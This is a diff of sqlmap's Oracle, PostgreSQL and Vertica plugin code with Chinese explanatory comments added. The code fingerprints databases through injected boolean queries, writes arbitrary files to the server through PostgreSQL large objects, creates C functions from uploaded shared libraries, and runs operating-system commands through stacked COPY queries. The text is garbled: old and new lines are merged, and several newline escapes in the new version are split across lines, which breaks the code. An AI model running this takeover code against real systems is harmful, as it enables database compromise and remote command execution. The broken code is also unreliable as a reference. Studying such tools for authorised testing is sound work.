output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2)) output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2))
@ -114,15 +128,15 @@ class Fingerprint(GenericFingerprint):
break break
return True return True
# 24. 如果初始测试结果为 False则输出警告信息并返回 False
else: else:
warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE
logger.warning(warnMsg) logger.warning(warnMsg)
return False return False
# 25. 强制枚举数据库对象名称为大写
def forceDbmsEnum(self): def forceDbmsEnum(self):
if conf.db: if conf.db:
conf.db = conf.db.upper() conf.db = conf.db.upper()
if conf.tbl: if conf.tbl:
conf.tbl = conf.tbl.upper() conf.tbl = conf.tbl.upper()

@ -5,79 +5,91 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import os # 1. 导入所需的模块
import os # 操作系统相关模块
from lib.core.common import randomInt
from lib.core.compat import xrange from lib.core.common import randomInt # 生成随机整数
from lib.core.data import kb from lib.core.compat import xrange # 兼容 Python 2 和 3 的 xrange
from lib.core.data import logger from lib.core.data import kb # 全局知识库
from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.data import logger # 日志记录器
from lib.core.settings import LOBLKSIZE from lib.core.exception import SqlmapUnsupportedFeatureException # 不支持的特性异常
from lib.request import inject from lib.core.settings import LOBLKSIZE # Large Object Block Size
from plugins.generic.filesystem import Filesystem as GenericFilesystem from lib.request import inject # 注入相关函数
from plugins.generic.filesystem import Filesystem as GenericFilesystem # 通用文件系统类
# 2. 定义一个类 Filesystem继承自 GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
# 3. 构造函数,初始化变量
def __init__(self): def __init__(self):
self.oid = None self.oid = None # Large Object OID
self.page = None self.page = None # Large Object page number
GenericFilesystem.__init__(self) GenericFilesystem.__init__(self)
# 4. 使用 stacked query 读取文件
def stackedReadFile(self, remoteFile): def stackedReadFile(self, remoteFile):
# 5. 如果不是暴力破解模式,则输出读取文件信息
if not kb.bruteMode: if not kb.bruteMode:
infoMsg = "fetching file: '%s'" % remoteFile infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
# 6. 初始化环境
self.initEnv() self.initEnv()
# 7. 调用 UDF 执行读取文件操作,返回读取的内容
return self.udfEvalCmd(cmd=remoteFile, udfName="sys_fileread") return self.udfEvalCmd(cmd=remoteFile, udfName="sys_fileread")
# 8. 使用 UNION query 写入文件PostgreSQL 不支持)
def unionWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False): def unionWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
# 9. 输出不支持的信息并抛出异常
errMsg = "PostgreSQL does not support file upload with UNION " errMsg = "PostgreSQL does not support file upload with UNION "
errMsg += "query SQL injection technique" errMsg += "query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
# 10. 使用 stacked query 写入文件
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
# 11. 获取本地文件大小
localFileSize = os.path.getsize(localFile) localFileSize = os.path.getsize(localFile)
# 12. 读取本地文件内容
content = open(localFile, "rb").read() content = open(localFile, "rb").read()
# 13. 生成随机 OID 和初始页码
self.oid = randomInt() self.oid = randomInt()
self.page = 0 self.page = 0
# 14. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "text") self.createSupportTbl(self.fileTblName, self.tblField, "text")
# 15. 输出调试信息
debugMsg = "create a new OID for a large object, it implicitly " debugMsg = "create a new OID for a large object, it implicitly "
debugMsg += "adds an entry in the large objects system table" debugMsg += "adds an entry in the large objects system table"
logger.debug(debugMsg) logger.debug(debugMsg)
# References: # References:
# http://www.postgresql.org/docs/8.3/interactive/largeobjects.html # http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
# http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html # http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
# 16. 删除已存在的 Large Object创建新的 Large Object并清理 Large Object 表
inject.goStacked("SELECT lo_unlink(%d)" % self.oid) inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
inject.goStacked("SELECT lo_create(%d)" % self.oid) inject.goStacked("SELECT lo_create(%d)" % self.oid)
inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid) inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid)
# 17. 循环读取文件内容,分块写入 Large Object
for offset in xrange(0, localFileSize, LOBLKSIZE): for offset in xrange(0, localFileSize, LOBLKSIZE):
# 18. 对文件内容进行 base64 编码
fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False) fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False)
# 19. 将 base64 编码的文件内容转换为 SQL 查询语句
sqlQueries = self.fileToSqlQueries(fcEncodedList) sqlQueries = self.fileToSqlQueries(fcEncodedList)
# 20. 执行 SQL 查询语句
for sqlQuery in sqlQueries: for sqlQuery in sqlQueries:
inject.goStacked(sqlQuery) inject.goStacked(sqlQuery)
# 21. 向 Large Object 表插入数据
inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, %d, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.page, self.tblField, self.fileTblName)) inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, %d, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.page, self.tblField, self.fileTblName))
# 22. 清理支持表
inject.goStacked("DELETE FROM %s" % self.fileTblName) inject.goStacked("DELETE FROM %s" % self.fileTblName)
# 23. 更新页码
self.page += 1 self.page += 1
# 24. 输出调试信息
debugMsg = "exporting the OID %s file content to " % fileType debugMsg = "exporting the OID %s file content to " % fileType
debugMsg += "file '%s'" % remoteFile debugMsg += "file '%s'" % remoteFile
logger.debug(debugMsg) logger.debug(debugMsg)
# 25. 使用 lo_export 函数将 Large Object 内容导出到文件
inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, remoteFile), silent=True) inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, remoteFile), silent=True)
# 26. 检查文件是否写入成功
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 27. 删除 Large Object
inject.goStacked("SELECT lo_unlink(%d)" % self.oid) inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
# 28. 返回文件是否写入成功
return written return written

@ -5,29 +5,35 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
from lib.core.common import Backend # 1. 从库中导入所需的模块
from lib.core.common import Format from lib.core.common import Backend # 后端数据库信息
from lib.core.common import hashDBRetrieve from lib.core.common import Format # 格式化输出
from lib.core.common import hashDBWrite from lib.core.common import hashDBRetrieve # 从哈希数据库检索数据
from lib.core.data import conf from lib.core.common import hashDBWrite # 向哈希数据库写入数据
from lib.core.data import kb from lib.core.data import conf # 全局配置信息
from lib.core.data import logger from lib.core.data import kb # 全局知识库
from lib.core.enums import DBMS from lib.core.data import logger # 日志记录器
from lib.core.enums import FORK from lib.core.enums import DBMS # 数据库类型枚举
from lib.core.enums import HASHDB_KEYS from lib.core.enums import FORK # 数据库分支枚举
from lib.core.enums import OS from lib.core.enums import HASHDB_KEYS # 哈希数据库键枚举
from lib.core.session import setDbms from lib.core.enums import OS # 操作系统枚举
from lib.core.settings import PGSQL_ALIASES from lib.core.session import setDbms # 设置当前数据库类型
from lib.request import inject from lib.core.settings import PGSQL_ALIASES # PostgreSQL 数据库的别名
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint from lib.request import inject # 注入相关函数
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 通用指纹识别类
# 2. 定义一个类 Fingerprint继承自 GenericFingerprint
class Fingerprint(GenericFingerprint): class Fingerprint(GenericFingerprint):
# 3. 构造函数,初始化数据库类型
def __init__(self): def __init__(self):
GenericFingerprint.__init__(self, DBMS.PGSQL) GenericFingerprint.__init__(self, DBMS.PGSQL)
# 4. 获取指纹信息
def getFingerprint(self): def getFingerprint(self):
# 5. 从哈希数据库中检索数据库分支信息
fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK)
# 6. 如果分支信息为空,则尝试识别数据库分支
if fork is None: if fork is None:
if inject.checkBooleanExpression("VERSION() LIKE '%CockroachDB%'"): if inject.checkBooleanExpression("VERSION() LIKE '%CockroachDB%'"):
fork = FORK.COCKROACHDB fork = FORK.COCKROACHDB
@ -47,92 +53,109 @@ class Fingerprint(GenericFingerprint):
fork = FORK.AURORA fork = FORK.AURORA
else: else:
fork = "" fork = ""
# 7. 将分支信息写入哈希数据库
hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork) hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork)
value = "" value = ""
# 8. 获取 Web 服务器操作系统指纹
wsOsFp = Format.getOs("web server", kb.headersFp) wsOsFp = Format.getOs("web server", kb.headersFp)
# 9. 将 Web 服务器操作系统指纹添加到输出
if wsOsFp: if wsOsFp:
value += "%s\n" % wsOsFp value += "%s\
" % wsOsFp
# 10. 如果有数据库 Banner 信息
if kb.data.banner: if kb.data.banner:
# 11. 获取后端数据库操作系统指纹
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
# 12. 将后端数据库操作系统指纹添加到输出
if dbmsOsFp: if dbmsOsFp:
value += "%s\n" % dbmsOsFp value += "%s\
" % dbmsOsFp
value += "back-end DBMS: " value += "back-end DBMS: "
# 13. 如果不是详细指纹,则返回数据库类型和分支信息
if not conf.extensiveFp: if not conf.extensiveFp:
value += DBMS.PGSQL value += DBMS.PGSQL
if fork: if fork:
value += " (%s fork)" % fork value += " (%s fork)" % fork
return value return value
# 14. 获取活动的指纹信息
actVer = Format.getDbms() actVer = Format.getDbms()
blank = " " * 15 blank = " " * 15
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
# 15. 如果有 Banner 解析指纹
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp.get("dbmsVersion") banVer = kb.bannerFp.get("dbmsVersion")
# 16. 如果有 Banner 版本号
if banVer: if banVer:
# 17. 格式化 Banner 版本号
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\
%sbanner parsing fingerprint: %s" % (blank, banVer)
# 18. 获取 HTML 错误指纹
htmlErrorFp = Format.getErrorParsedDBMSes() htmlErrorFp = Format.getErrorParsedDBMSes()
# 19. 将 HTML 错误指纹添加到输出
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
# 20. 如果有数据库分支信息,则将其添加到输出
if fork: if fork:
value += "\n%sfork fingerprint: %s" % (blank, fork) value += "\n%sfork fingerprint: %s" % (blank, fork)
# 21. 返回完整的指纹信息
return value return value
# 22. 检查数据库类型是否为 PostgreSQL
def checkDbms(self): def checkDbms(self):
""" """
References for fingerprint: References for fingerprint:
* https://www.postgresql.org/docs/current/static/release.html * https://www.postgresql.org/docs/current/static/release.html
""" """
# 23. 如果不是详细指纹,且当前数据库类型属于 PostgreSQL 别名,则设置数据库类型为 PostgreSQL 并返回 True
if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES): if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES):
setDbms(DBMS.PGSQL) setDbms(DBMS.PGSQL)
self.getBanner() self.getBanner()
return True return True
# 24. 输出正在测试的数据库类型
infoMsg = "testing %s" % DBMS.PGSQL infoMsg = "testing %s" % DBMS.PGSQL
logger.info(infoMsg) logger.info(infoMsg)
# NOTE: Vertica works too without the CONVERT_TO() # 25. 执行 SQL 查询,检查数据库类型是否为 PostgreSQL (基于 CONVERT_TO 和 QUOTE_IDENT 函数)
result = inject.checkBooleanExpression("CONVERT_TO('[RANDSTR]', QUOTE_IDENT(NULL)) IS NULL") result = inject.checkBooleanExpression("CONVERT_TO('[RANDSTR]', QUOTE_IDENT(NULL)) IS NULL")
# 26. 如果查询成功
if result: if result:
# 27. 输出确认信息
infoMsg = "confirming %s" % DBMS.PGSQL infoMsg = "confirming %s" % DBMS.PGSQL
logger.info(infoMsg) logger.info(infoMsg)
# 28. 执行 SQL 查询,再次确认数据库类型是否为 PostgreSQL (基于 COALESCE 函数)
result = inject.checkBooleanExpression("COALESCE([RANDNUM], NULL)=[RANDNUM]") result = inject.checkBooleanExpression("COALESCE([RANDNUM], NULL)=[RANDNUM]")
# 29. 如果再次确认失败,则输出警告信息,并返回 False
if not result: if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
logger.warning(warnMsg) logger.warning(warnMsg)
return False return False
# 30. 设置数据库类型为 PostgreSQL
setDbms(DBMS.PGSQL) setDbms(DBMS.PGSQL)
# 31. 获取数据库 Banner 信息
self.getBanner() self.getBanner()
# 32. 如果不是详细指纹,则返回 True
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
# 33. 输出正在进行详细指纹识别
infoMsg = "actively fingerprinting %s" % DBMS.PGSQL infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
logger.info(infoMsg) logger.info(infoMsg)
# 34. 通过检查不同版本的函数,设置 PostgreSQL 版本
if inject.checkBooleanExpression("RANDOM_NORMAL(0.0, 1.0) IS NOT NULL"): if inject.checkBooleanExpression("RANDOM_NORMAL(0.0, 1.0) IS NOT NULL"):
Backend.setVersion(">= 16.0") Backend.setVersion(">= 16.0")
elif inject.checkBooleanExpression("REGEXP_COUNT(NULL,NULL) IS NULL"): elif inject.checkBooleanExpression("REGEXP_COUNT(NULL,NULL) IS NULL"):
@ -193,39 +216,43 @@ class Fingerprint(GenericFingerprint):
Backend.setVersion("< 6.2.0") Backend.setVersion("< 6.2.0")
return True return True
# 35. 如果第一次查询失败,则输出警告信息,并返回 False
else: else:
warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
logger.warning(warnMsg) logger.warning(warnMsg)
return False return False
# 36. 检查数据库服务器的操作系统
def checkDbmsOs(self, detailed=False): def checkDbmsOs(self, detailed=False):
# 37. 如果已经获取到操作系统信息,则直接返回
if Backend.getOs(): if Backend.getOs():
return return
# 38. 输出正在进行操作系统指纹识别
infoMsg = "fingerprinting the back-end DBMS operating system" infoMsg = "fingerprinting the back-end DBMS operating system"
logger.info(infoMsg) logger.info(infoMsg)
# 39. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "character(10000)") self.createSupportTbl(self.fileTblName, self.tblField, "character(10000)")
# 40. 将 VERSION() 的结果插入到支持表中
inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "VERSION()")) inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "VERSION()"))
# 41. 定义 Windows 操作系统特有的关键字
# Windows executables should always have ' Visual C++' or ' mingw' # Windows executables should always have ' Visual C++' or ' mingw'
# patterns within the banner # patterns within the banner
osWindows = (" Visual C++", "mingw") osWindows = (" Visual C++", "mingw")
# 42. 循环检查是否存在 Windows 操作系统关键字
for osPattern in osWindows: for osPattern in osWindows:
query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField)
query += "LIKE '%" + osPattern + "%')>0" query += "LIKE '%" + osPattern + "%')>0"
# 43. 如果存在 Windows 操作系统关键字,则设置操作系统为 Windows
if inject.checkBooleanExpression(query): if inject.checkBooleanExpression(query):
Backend.setOs(OS.WINDOWS) Backend.setOs(OS.WINDOWS)
break break
# 44. 如果没有检测到 Windows 操作系统,则设置操作系统为 Linux
if Backend.getOs() is None: if Backend.getOs() is None:
Backend.setOs(OS.LINUX) Backend.setOs(OS.LINUX)
# 45. 输出检测到的操作系统信息
infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
logger.info(infoMsg) logger.info(infoMsg)
# 46. 清理支持表
self.cleanup(onlyFileTbl=True) self.cleanup(onlyFileTbl=True)

@ -5,101 +5,115 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import os # 1. 导入所需的模块
import os # 操作系统相关功能
from lib.core.common import Backend
from lib.core.common import checkFile from lib.core.common import Backend # 后端数据库信息
from lib.core.common import decloakToTemp from lib.core.common import checkFile # 检查文件是否存在
from lib.core.common import flattenValue from lib.core.common import decloakToTemp # 解密临时文件路径
from lib.core.common import filterNone from lib.core.common import flattenValue # 将嵌套列表展平
from lib.core.common import isListLike from lib.core.common import filterNone # 过滤列表中的 None 值
from lib.core.common import isNoneValue from lib.core.common import isListLike # 检查是否为列表类型
from lib.core.common import isStackingAvailable from lib.core.common import isNoneValue # 检查是否为 None 值
from lib.core.common import randomStr from lib.core.common import isStackingAvailable # 检查是否支持堆叠查询
from lib.core.compat import LooseVersion from lib.core.common import randomStr # 生成随机字符串
from lib.core.data import kb from lib.core.compat import LooseVersion # 版本比较
from lib.core.data import logger from lib.core.data import kb # 全局知识库
from lib.core.data import paths from lib.core.data import logger # 日志记录器
from lib.core.enums import OS from lib.core.data import paths # 路径相关信息
from lib.core.exception import SqlmapSystemException from lib.core.enums import OS # 操作系统枚举
from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.exception import SqlmapSystemException # 系统异常
from lib.request import inject from lib.core.exception import SqlmapUnsupportedFeatureException # 不支持的特性异常
from plugins.generic.takeover import Takeover as GenericTakeover from lib.request import inject # 注入相关函数
from plugins.generic.takeover import Takeover as GenericTakeover # 通用提权类
# 2. 定义一个类 Takeover继承自 GenericTakeover
class Takeover(GenericTakeover): class Takeover(GenericTakeover):
# 3. 设置远程 UDF 文件路径
def udfSetRemotePath(self): def udfSetRemotePath(self):
# On Windows # 4. 如果是 Windows 系统
if Backend.isOs(OS.WINDOWS): if Backend.isOs(OS.WINDOWS):
# The DLL can be in any folder where postgres user has # 5. UDF 文件可以放在任何 PostgreSQL 用户具有读/写/执行权限的目录
# read/write/execute access is valid # 注意:不指定路径将保存在数据目录中
# NOTE: by not specifing any path, it will save into the # 在 PostgreSQL 8.3 中默认路径为C:\Program Files\PostgreSQL\8.3\data
# data directory, on PostgreSQL 8.3 it is
# C:\Program Files\PostgreSQL\8.3\data.
self.udfRemoteFile = "%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt) self.udfRemoteFile = "%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt)
# 6. 如果是 Linux 系统
# On Linux
else: else:
# The SO can be in any folder where postgres user has # 7. SO 文件可以放在任何 PostgreSQL 用户具有读/写/执行权限的目录
# read/write/execute access is valid
self.udfRemoteFile = "/tmp/%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt) self.udfRemoteFile = "/tmp/%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt)
# 8. 设置本地 UDF 文件路径
def udfSetLocalPaths(self): def udfSetLocalPaths(self):
# 9. 设置 UDF 本地文件路径和共享库名称
self.udfLocalFile = paths.SQLMAP_UDF_PATH self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True) self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
# 10. 从 Banner 信息中获取数据库版本
self.getVersionFromBanner() self.getVersionFromBanner()
banVer = kb.bannerFp["dbmsVersion"] banVer = kb.bannerFp["dbmsVersion"]
# 11. 如果没有数据库版本信息,或者版本号不是数字开头,则抛出异常
if not banVer or not banVer[0].isdigit(): if not banVer or not banVer[0].isdigit():
errMsg = "unsupported feature on unknown version of PostgreSQL" errMsg = "unsupported feature on unknown version of PostgreSQL"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
# 12. 如果数据库版本大于等于 10则取主版本号
elif LooseVersion(banVer) >= LooseVersion("10"): elif LooseVersion(banVer) >= LooseVersion("10"):
majorVer = banVer.split('.')[0] majorVer = banVer.split('.')[0]
# 13. 如果数据库版本大于等于 8.2,则取主版本号和小版本号
elif LooseVersion(banVer) >= LooseVersion("8.2") and '.' in banVer: elif LooseVersion(banVer) >= LooseVersion("8.2") and '.' in banVer:
majorVer = '.'.join(banVer.split('.')[:2]) majorVer = '.'.join(banVer.split('.')[:2])
# 14. 如果数据库版本小于 8.2,则抛出异常
else: else:
errMsg = "unsupported feature on versions of PostgreSQL before 8.2" errMsg = "unsupported feature on versions of PostgreSQL before 8.2"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
# 15. 尝试获取 UDF 文件
try: try:
# 16. 如果是 Windows 系统
if Backend.isOs(OS.WINDOWS): if Backend.isOs(OS.WINDOWS):
_ = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll_") _ = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll_")
checkFile(_) checkFile(_)
self.udfLocalFile = decloakToTemp(_) self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "dll" self.udfSharedLibExt = "dll"
# 17. 如果是 Linux 系统
else: else:
_ = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so_") _ = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so_")
checkFile(_) checkFile(_)
self.udfLocalFile = decloakToTemp(_) self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "so" self.udfSharedLibExt = "so"
# 18. 如果找不到 UDF 文件,则抛出异常
except SqlmapSystemException: except SqlmapSystemException:
errMsg = "unsupported feature on PostgreSQL %s (%s-bit)" % (majorVer, Backend.getArch()) errMsg = "unsupported feature on PostgreSQL %s (%s-bit)" % (majorVer, Backend.getArch())
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
# 19. 从共享库创建 UDF
def udfCreateFromSharedLib(self, udf, inpRet): def udfCreateFromSharedLib(self, udf, inpRet):
# 20. 如果需要创建 UDF
if udf in self.udfToCreate: if udf in self.udfToCreate:
logger.info("creating UDF '%s' from the binary UDF file" % udf) logger.info("creating UDF '%s' from the binary UDF file" % udf)
inp = ", ".join(i for i in inpRet["input"]) inp = ", ".join(i for i in inpRet["input"])
ret = inpRet["return"] ret = inpRet["return"]
# 21. 创建 UDF 的 SQL 语句
# Reference: http://www.postgresql.org/docs/8.3/interactive/sql-createfunction.html # Reference: http://www.postgresql.org/docs/8.3/interactive/sql-createfunction.html
inject.goStacked("DROP FUNCTION %s(%s)" % (udf, inp)) inject.goStacked("DROP FUNCTION %s(%s)" % (udf, inp))
inject.goStacked("CREATE OR REPLACE FUNCTION %s(%s) RETURNS %s AS '%s', '%s' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE" % (udf, inp, ret, self.udfRemoteFile, udf)) inject.goStacked("CREATE OR REPLACE FUNCTION %s(%s) RETURNS %s AS '%s', '%s' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE" % (udf, inp, ret, self.udfRemoteFile, udf))
self.createdUdf.add(udf) self.createdUdf.add(udf)
# 22. 如果不需要创建 UDF
else: else:
logger.debug("keeping existing UDF '%s' as requested" % udf) logger.debug("keeping existing UDF '%s' as requested" % udf)
# 23. 发送 UNC 路径请求
def uncPathRequest(self): def uncPathRequest(self):
# 24. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "text") self.createSupportTbl(self.fileTblName, self.tblField, "text")
# 25. 执行 COPY 命令,发送 UNC 路径请求
inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True) inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True)
# 26. 清理支持表
self.cleanup(onlyFileTbl=True) self.cleanup(onlyFileTbl=True)
# 27. 执行系统命令,并返回输出
def copyExecCmd(self, cmd): def copyExecCmd(self, cmd):
output = None output = None
# 28. 如果支持堆叠查询
if isStackingAvailable(): if isStackingAvailable():
# Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5 # Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName
@ -109,21 +123,17 @@ class Takeover(GenericTakeover):
query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName) query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
output = inject.getValue(query, resumeValue=False) output = inject.getValue(query, resumeValue=False)
if isListLike(output): if isListLike(output):
output = flattenValue(output) output = flattenValue(output)
output = filterNone(output) output = filterNone(output)
if not isNoneValue(output): if not isNoneValue(output):
output = os.linesep.join(output) output = os.linesep.join(output)
self._cleanupCmd = "DROP TABLE %s" % self.cmdTblName self._cleanupCmd = "DROP TABLE %s" % self.cmdTblName
inject.goStacked(self._cleanupCmd) inject.goStacked(self._cleanupCmd)
return output return output
# 29. 检查是否支持 COPY 命令执行系统命令
def checkCopyExec(self): def checkCopyExec(self):
if kb.copyExecTest is None: if kb.copyExecTest is None:
kb.copyExecTest = self.copyExecCmd("echo 1") == '1' kb.copyExecTest = self.copyExecCmd("echo 1") == '1'
return kb.copyExecTest return kb.copyExecTest

@ -5,102 +5,107 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
from lib.core.common import Backend # 导入必要的模块
from lib.core.common import Format from lib.core.common import Backend # 导入 Backend 类,用于访问后端数据库信息
from lib.core.data import conf from lib.core.common import Format # 导入 Format 类,用于格式化输出信息
from lib.core.data import kb from lib.core.data import conf # 导入 conf 对象,用于访问全局配置信息
from lib.core.data import logger from lib.core.data import kb # 导入 kb 对象,用于访问全局知识库
from lib.core.enums import DBMS from lib.core.data import logger # 导入 logger 对象,用于输出日志
from lib.core.session import setDbms from lib.core.enums import DBMS # 导入 DBMS 枚举,定义数据库管理系统类型
from lib.core.settings import VERTICA_ALIASES from lib.core.session import setDbms # 导入 setDbms 函数,用于设置数据库类型
from lib.request import inject from lib.core.settings import VERTICA_ALIASES # 导入 VERTICA_ALIASES 常量,定义 Vertica 数据库的别名
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint from lib.request import inject # 导入 inject 函数,用于执行 SQL 注入请求
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 导入 GenericFingerprint 类,作为当前类的父类
# 定义 Fingerprint 类,继承自 GenericFingerprint
class Fingerprint(GenericFingerprint): class Fingerprint(GenericFingerprint):
# 初始化 Fingerprint 类,设置数据库类型为 Vertica
def __init__(self): def __init__(self):
GenericFingerprint.__init__(self, DBMS.VERTICA) GenericFingerprint.__init__(self, DBMS.VERTICA)
# 定义 getFingerprint 方法,用于获取数据库指纹信息
def getFingerprint(self): def getFingerprint(self):
value = "" value = "" # 初始化指纹信息字符串
wsOsFp = Format.getOs("web server", kb.headersFp) wsOsFp = Format.getOs("web server", kb.headersFp) # 获取 Web 服务器操作系统信息
if wsOsFp: if wsOsFp:
value += "%s\n" % wsOsFp value += "%s\
" % wsOsFp # 将 Web 服务器操作系统信息添加到指纹信息
if kb.data.banner: if kb.data.banner: # 如果存在数据库 banner 信息
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) # 获取数据库操作系统信息
if dbmsOsFp: if dbmsOsFp:
value += "%s\n" % dbmsOsFp value += "%s\
" % dbmsOsFp # 将数据库操作系统信息添加到指纹信息
value += "back-end DBMS: " value += "back-end DBMS: " # 添加数据库类型标签
if not conf.extensiveFp: if not conf.extensiveFp: # 如果不需要详细指纹信息
value += DBMS.VERTICA value += DBMS.VERTICA # 将数据库类型添加到指纹信息
return value return value # 返回指纹信息
actVer = Format.getDbms() actVer = Format.getDbms() # 获取数据库类型
blank = " " * 15 blank = " " * 15 # 定义缩进空格
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer # 添加当前指纹信息
if kb.bannerFp: if kb.bannerFp: # 如果存在数据库 banner 信息
banVer = kb.bannerFp.get("dbmsVersion") banVer = kb.bannerFp.get("dbmsVersion") # 获取数据库版本信息
if banVer: if banVer:
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer]) # 格式化数据库版本信息
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\
%sbanner parsing fingerprint: %s" % (blank, banVer) # 将 banner 版本信息添加到指纹信息
